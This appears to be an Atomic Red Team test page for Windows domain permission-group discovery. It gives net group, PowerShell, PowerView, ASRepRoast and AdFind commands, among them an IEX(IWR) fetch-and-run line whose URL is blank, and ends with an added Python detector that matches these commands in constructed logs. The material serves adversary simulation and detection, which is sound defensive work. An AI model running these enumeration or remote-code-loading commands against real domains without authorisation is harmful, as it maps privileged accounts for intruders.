Adversaries may attempt to find domain-level groups and permission settings. Knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.
Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
Atomic Test #3 - Elevated group enumeration using net group (Domain)
Atomic Test #4 - Find machines where user has local admin access (PowerView)
Atomic Test #5 - Find local admins on all machines in domain (PowerView)
Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
net localgroup
net group /domain
net group "domain admins" /domain
net group "enterprise admins" /domain
Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
Name | Description | Type | Default Value |
user | User to identify what groups a user is a member of | string | administrator |
get-ADPrincipalGroupMembership #{user} | select name
Atomic Test #3 - Elevated group enumeration using net group (Domain)
Runs the "net group" command, including the "net groups" alias and loosely typed switches (/domai, /doma instead of /domain), to simulate enumeration/discovery of high-value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
net group /domai "Domain Admins"
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
Atomic Test #4 - Find machines where user has local admin access (PowerView)
Find machines where the current user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
Supported Platforms: Windows
IEX (IWR ''); Find-LocalAdminAccess -Verbose
Atomic Test #5 - Find local admins on all machines in domain (PowerView)
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
Supported Platforms: Windows
IEX (IWR ''); Invoke-EnumerateLocalAdmin -Verbose
Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
Takes a computer name and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
Supported Platforms: Windows
Name | Description | Type | Default Value |
computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME |
IEX (IWR ''); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
When successful, accounts that do not require Kerberos pre-authentication will be returned.
Supported Platforms: Windows
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
Dependency: the computer must be domain joined. Check prereq command:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get prereq command:
Write-Host Joining this computer to a domain must be done manually.
Dependency: the PowerShell ActiveDirectory module must be installed. Check prereq command:
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
Get prereq command:
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~"
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented in reporting on ransomware actors enumerating Active Directory groups (reference).
Supported Platforms: Windows
Name | Description | Type | Default Value |
adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe |
#{adfind_path} -f (objectcategory=group)
Dependency: AdFind.exe must exist at #{adfind_path}. Check prereq command:
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
Get prereq command:
Invoke-WebRequest -Uri "" -OutFile #{adfind_path}
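Every test on this page runs a distinctive command line, which is what a defender should key on. The script below is an added example (not code from the Atomic Red Team project): it scans process-creation records for the net group / net groups forms from Tests #1 and #3 (including the truncated /doma and /domai switches and the quoted high-value group names), the Get-ADPrincipalGroupMembership cmdlet from Test #2, the PowerView functions from Tests #4 to #6, the DoesNotRequirePreAuth property from Test #7 and the AdFind objectcategory=group filter, then raises the hosts on which several distinct techniques fire in sequence. The record layout (timestamp|host|user|parent|command line), the technique tags, the burst threshold and all sample hosts, users and timestamps are assumptions constructed for the example.

```python
"""Added example (not from the Atomic Red Team page): flags the domain-group
discovery commands used by the tests above in process-creation telemetry.
The record layout (timestamp|host|user|parent|command line) and all sample
values are constructed for this example, not real logs."""
import re

# Groups the tests ask for; matched case-insensitively, with or without "BUILTIN\".
HIGH_VALUE_GROUPS = {"domain admins", "enterprise admins", "account operators",
                     "backup operators", "exchange organization management"}

# net/net1 group|groups with any prefix of /domain (net.exe accepts /doma, /domai, ...).
NET_GROUP_DOMAIN = re.compile(r"\bnet1?(?:\.exe)?\s+groups?\b(?=.*\s/dom[a-z]*\b)", re.I)
NET_LOCALGROUP = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\b", re.I)
QUOTED_GROUP = re.compile(r'"(?:BUILTIN\\)?([^"]+)"', re.I)
ADFIND_GROUP_FILTER = re.compile(r"adfind(?:\.exe)?\b.*objectcategory=group", re.I)

# Cmdlet / PowerView / property names taken from Atomic Tests #2, #4, #5, #6 and #7.
POWERSHELL_MARKERS = {
    "get-adprincipalgroupmembership": "ad_module_group_membership",
    "find-localadminaccess": "powerview_local_admin_access",
    "invoke-enumeratelocaladmin": "powerview_enumerate_local_admin",
    "find-gpocomputeradmin": "powerview_gpo_computer_admin",
    "doesnotrequirepreauth": "asreproast_candidate_enum",
}


def classify_command(cmdline):
    """Return (technique_tag, [high-value groups named]) or (None, [])."""
    groups = [g.lower() for g in QUOTED_GROUP.findall(cmdline)
              if g.lower() in HIGH_VALUE_GROUPS]
    lowered = cmdline.lower()
    if NET_GROUP_DOMAIN.search(cmdline):
        return "net_group_domain", groups
    if NET_LOCALGROUP.search(cmdline):
        return "net_localgroup", groups
    for marker, tag in POWERSHELL_MARKERS.items():
        if marker in lowered:
            return tag, groups
    if ADFIND_GROUP_FILTER.search(cmdline):
        return "adfind_group_enum", groups
    return None, []


def parse_record(line):
    """Split one constructed record into its five fields; None if malformed.
    maxsplit=4 keeps pipes inside the command line (e.g. '| select name')."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    keys = ("ts", "host", "user", "parent", "cmdline")
    return dict(zip(keys, parts))


def scan(lines):
    """Return one finding dict per record whose command line matches a test pattern."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        tag, groups = classify_command(rec["cmdline"])
        if tag:
            findings.append({**rec, "technique": tag, "groups": groups})
    return findings


def hosts_with_burst(findings, threshold=3):
    """Hosts where at least `threshold` distinct techniques fired. One 'net group'
    is routine admin work; several discovery techniques in a row from one host is
    the pattern worth paging on."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f["host"], set()).add(f["technique"])
    return sorted(h for h, techs in per_host.items() if len(techs) >= threshold)


# Constructed sample records (not real telemetry); hosts and users are made up.
SAMPLE_RECORDS = [
    "2024-01-05T09:10:01|WS01|CORP\\jdoe|cmd.exe|net group /domain",
    '2024-01-05T09:10:02|WS01|CORP\\jdoe|cmd.exe|net group "domain admins" /domain',
    '2024-01-05T09:10:03|WS01|CORP\\jdoe|cmd.exe|net groups "Account Operators" /doma',
    '2024-01-05T09:10:04|WS01|CORP\\jdoe|cmd.exe|net group "BUILTIN\\Backup Operators" /doma',
    "2024-01-05T09:11:00|WS01|CORP\\jdoe|powershell.exe|get-ADPrincipalGroupMembership administrator | select name",
    "2024-01-05T09:12:00|WS01|CORP\\jdoe|powershell.exe|Find-LocalAdminAccess -Verbose",
    "2024-01-05T09:13:00|WS01|CORP\\jdoe|powershell.exe|get-aduser -f * -pr DoesNotRequirePreAuth",
    '2024-01-05T10:00:00|SRV02|CORP\\svc_backup|cmd.exe|net group "Domain Admins" /domain',
    "2024-01-05T10:05:00|SRV03|CORP\\admin|cmd.exe|AdFind.exe -f (objectcategory=group)",
    "2024-01-05T10:06:00|SRV03|CORP\\admin|cmd.exe|net use Z: \\\\fs01\\share",
    "malformed line without enough fields",
]

if __name__ == "__main__":
    found = scan(SAMPLE_RECORDS)
    for f in found:
        print(f"{f['host']:6}{f['user']:16}{f['technique']:32}{f['groups']}")
    print("burst hosts:", hosts_with_burst(found))
```

The loose /dom[a-z]* match matters because net.exe accepts any unambiguous prefix of /domain, so a rule that looks only for the literal string /domain misses exactly the variants Test #3 exercises. The per-host burst count is a rough triage aid: in practice the threshold and the window (here, the whole sample) should be tuned to how often help-desk and admin accounts legitimately run net group in the environment.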